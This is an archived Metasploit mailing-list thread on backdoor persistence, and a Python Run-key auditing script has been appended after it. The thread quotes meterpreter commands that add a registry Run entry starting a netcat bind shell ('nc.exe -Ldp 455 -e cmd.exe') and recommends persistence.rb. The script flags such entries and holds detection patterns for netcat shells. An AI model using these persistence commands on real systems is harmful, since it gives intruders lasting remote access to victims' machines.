Metasploit mailing list archives
Re: Persistent Backdoor
From: Sherif El-Deeb <archeldeeb () gmail com>
Date: Sun, 10 Oct 2010 19:39:15 +0300
Same behavior with REV_HTTPS here, it is not working anymore with XP, Vista and 7 "x86", no AV. Sorry for going off topic...

Sherif Eldeeb.

On Sun, Oct 10, 2010 at 5:52 PM, Miguel Rios <miguelrios35 () yahoo com> wrote:

> Hi,
>
> Yeah, I noticed the same behavior with reverse_https lately, which is why I'm using reverse_tcp for now. Reverse_https used to work very well, but now I also get the timeout issue after it starts sending the initial stage. Sorry I can't really help. I can only confirm I'm getting the same issue with that payload, independently of whether it's persistent or not.
>
> cheers
>
> --- On Sat, 10/9/10, Tom Van de Wiele <tom.vandewiele () gmail com> wrote:
>
> > From: Tom Van de Wiele <tom.vandewiele () gmail com>
> > Subject: Re: [framework] Persistent Backdoor
> > To: "framework" <framework () spool metasploit com>
> > Date: Saturday, October 9, 2010, 9:09 PM
> >
> > Hi,
> >
> > Sort of dropping into this thread, my apologies.
> >
> > Persistence.rb is really recommended instead of setting regkeys individually. Unless the victim has checks for the regkeys set by persistence.rb, of course.
> >
> > I have a little issue with it, in that it runs great with e.g. a windows/meterpreter/reverse_tcp payload, but has anyone experienced problems with running it with a windows/meterpreter/reverse_https payload?
> >
> > I'm doing a file format client directed attack with another box as an exploit/multi/handler, and on that box I see the reverse connection coming in from the victim to my multi/handler. I see a TCP handshake being performed but then no data being sent by the victim, after which the connection times out.
> >
> > I'm using reverse_https with 443/tcp as the client connecting back has to traverse a proxy server. I have tried this in another test lab with no proxy server in between (2 machines sitting in the same LAN), but I get the same behavior.
> >
> > Using ruby1.9.1 and build svn r10585 from 2 days ago.
> >
> > Thank you for sharing your experiences or any pointers on how I can diagnose this further.
> >
> > On Mon, Oct 4, 2010 at 3:40 PM, David Kennedy <kennedyd013 () gmail com> wrote:
> >
> > > Why not use run persistence from meterpreter?
> > >
> > > On Oct 4, 2010 9:36 AM, "Eric" <dkn4a1 () gmail com> wrote:
> > >
> > > > Hi,
> > > >
> > > > Neither
> > > >
> > > >     meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe"
> > > >
> > > > nor
> > > >
> > > >     meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\\windows\\system32\\nc.exe -Ldp 455 -e cmd.exe"
> > > >
> > > > seems to work for me :-(

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
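The defender's counterpart to the Run-key persistence discussed in this thread (the `nc.exe -Ldp 455 -e cmd.exe` entry, or what persistence.rb writes), added here as an example and not code from the thread or from Metasploit: a small Python audit that parses the output of `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` and flags entries that look like a planted backdoor. The `reg query` output below is constructed for the example; the three heuristics (netcat started with `-e`, an executable in a user-writable path, a Windows system binary name running from outside C:\Windows) are this example's own assumptions and are a starting point, not a complete detection.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample of `reg query` output for the Run key on a host where the
# netcat entry from the thread was added next to ordinary software entries.
# These lines are made up for the example, not captured from a real system.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    nc    REG_SZ    C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe
    updater    REG_SZ    C:\Users\Public\svchost.exe
"""


@dataclass
class RunEntry:
    name: str       # value name under the Run key
    reg_type: str   # REG_SZ, REG_EXPAND_SZ, ...
    command: str    # command line Windows runs at logon


# `reg query` prints each value as: 4 spaces, name, 4 spaces, type, 4 spaces, data.
LINE_RE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")


def parse_reg_query(text: str) -> list[RunEntry]:
    """Turn `reg query` output into RunEntry objects, skipping key names and blanks."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            entries.append(RunEntry(m["name"], m["type"], m["data"].strip()))
    return entries


def executable_of(command: str) -> str:
    """Return the program path from a Run value, honouring a quoted path with spaces."""
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end != -1 else command[1:]
    return command.split(" ", 1)[0]


# Heuristics (assumptions of this example, not an exhaustive list).
NETCAT_SHELL = re.compile(r"(^|\\)nc(at|64)?\.exe\b.*\s-e\s", re.IGNORECASE)
USER_WRITABLE = re.compile(
    r"^(C:\\Users\\|%temp%|%appdata%|C:\\ProgramData\\|C:\\Windows\\Temp\\)",
    re.IGNORECASE,
)
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe"}
WINDOWS_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\")


def findings_for(entry: RunEntry) -> list[str]:
    """List the reasons an entry looks suspicious (empty list means nothing flagged)."""
    reasons = []
    exe = executable_of(entry.command)
    if NETCAT_SHELL.search(entry.command):
        reasons.append("netcat launched with -e: a command shell bound to a socket")
    if USER_WRITABLE.match(exe):
        reasons.append("executable lives in a user-writable location")
    base = exe.rsplit("\\", 1)[-1].lower()
    if base in SYSTEM_NAMES and not exe.lower().startswith(WINDOWS_DIRS):
        reasons.append(f"{base} is a Windows system binary name but runs from outside C:\\Windows")
    return reasons


def audit(text: str) -> dict[str, list[str]]:
    """Map each flagged Run value name to its list of reasons."""
    return {e.name: r for e in parse_reg_query(text) if (r := findings_for(e))}


if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_REG_QUERY).items():
        print(f"[!] Run value '{name}':")
        for reason in reasons:
            print(f"      - {reason}")
```

On a live host, feed it the output of `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` (and the HKCU key, plus RunOnce), rather than the constructed sample; a Run value that names netcat with `-e`, or a "system" binary under C:\Users, should stand out immediately in the two flagged entries this sample produces.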
Current thread:
- Persistent Backdoor Eric (Oct 04)
- Re: Persistent Backdoor David Kennedy (Oct 04)
- Re: Persistent Backdoor John Nash (Oct 04)
- Re: Persistent Backdoor Eric (Oct 05)
- Re: Persistent Backdoor Tom Van de Wiele (Oct 09)
- Re: Persistent Backdoor Miguel Rios (Oct 10)
- Re: Persistent Backdoor Sherif El-Deeb (Oct 10)
- Re: Persistent Backdoor David Kennedy (Oct 04)